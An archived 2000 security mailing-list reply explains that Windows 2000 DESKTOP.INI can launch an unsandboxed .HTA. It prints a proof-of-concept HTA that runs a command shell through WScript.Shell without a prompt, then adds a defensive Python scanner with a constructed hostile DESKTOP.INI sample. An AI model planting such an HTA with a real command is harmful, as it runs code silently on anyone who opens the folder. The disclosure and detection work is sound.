Subject: Re: local Administrator compromise at least on default Windows 2000
From: Greg Anuzelli (greg@DIGITALINFO.NET)
Date: Tue Aug 15 2000 - 16:37:20 CDT
- Next message: Shawn Wright: "Re: Process listening on TCP port 4198?"
- Previous message: Russ: "Re: Translate:f summary, history and thoughts"
- Maybe in reply to: Georgi Guninski: "local Administrator compromise at least on default Windows 2000"
- Maybe reply: Greg Anuzelli: "Re: local Administrator compromise at least on default Windows 2000"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Well, now that the cat's out of the bag I guess it's safe to discuss. :)
>Whether or not an .HTA could be invoked will, presumably, depend on what it
>attempts to do. Presumably it's under the same constraints that FOLDER.HTT is
>under, namely that the use of "unsafe" HTML code will cause it not to work.
>Assuming that Georgi's discovery about the OBJECT tag being able to invoke
>an application is a BUG, an .HTA that might do harm (that isn't using this
>OBJECT flaw) will cause a warning and not succeed.
The problem here is that an .HTA, by definition, does not operate in a
security sandbox. For all intents and purposes, they are applications like
.EXEs. So pointing to a FOLDER.HTA in DESKTOP.INI that contains this:
<html>
<body>
<script language="JavaScript">
// An .HTA runs outside the browser security zones, so WScript.Shell
// is instantiated without any prompt.
var obj = new ActiveXObject("WScript.Shell");
var string = "cmd /k echo Hi";
// Run(command, windowStyle): 1 = show the window normally
obj.Run(string, 1);
</script>
</body>
</html>
Will pop up a command prompt just fine, no questions asked. The bug is that
desktop.ini should not launch .HTAs, due to their trusted nature.
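As a defender-side check on the behaviour described in this thread, here is an added Python scanner (not code from the original post or from Microsoft) that parses DESKTOP.INI files and reports any value that names an .HTA file. The section and key names in the constructed sample, and the BOM-based decoding of the file, are assumptions for illustration; the check itself flags an .hta reference under any key.

```python
import configparser
import os
import re

# Constructed sample of a hostile DESKTOP.INI: the folder web-view template
# points at an .HTA instead of the usual FOLDER.HTT. Section and key names
# are assumptions for illustration; the scanner does not depend on them.
SUSPICIOUS_DESKTOP_INI = """\
[.ShellClassInfo]
ConfirmFileOp=0
[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=file://Folder.hta
"""

# Constructed benign sample: only a custom folder icon.
BENIGN_DESKTOP_INI = """\
[.ShellClassInfo]
IconResource=%SystemRoot%\\system32\\shell32.dll,3
"""

# ".hta" followed by a word boundary, so "foo.htaccess" is not a hit.
HTA_REF = re.compile(r"\.hta\b", re.IGNORECASE)


def find_hta_references(ini_text):
    """Return (section, key, value) triples whose value names an .hta file."""
    parser = configparser.ConfigParser(strict=False, allow_no_value=True,
                                       interpolation=None)
    parser.optionxform = str  # keep key names exactly as written
    parser.read_string(ini_text)
    hits = []
    for section in parser.sections():
        for key, value in parser.items(section):
            if value is not None and HTA_REF.search(value):
                hits.append((section, key, value))
    return hits


def load_desktop_ini(path):
    """Assumption: Windows often writes desktop.ini as UTF-16 with a BOM."""
    with open(path, "rb") as fh:
        raw = fh.read()
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig", errors="replace")


def scan_tree(root):
    """Walk a directory tree; map each desktop.ini path to its .hta hits."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower() == "desktop.ini":
                path = os.path.join(dirpath, name)
                hits = find_hta_references(load_desktop_ini(path))
                if hits:
                    findings[path] = hits
    return findings
```

Run `scan_tree` against user-writable roots (profile folders, shares) to surface folders whose DESKTOP.INI would launch an .HTA on open.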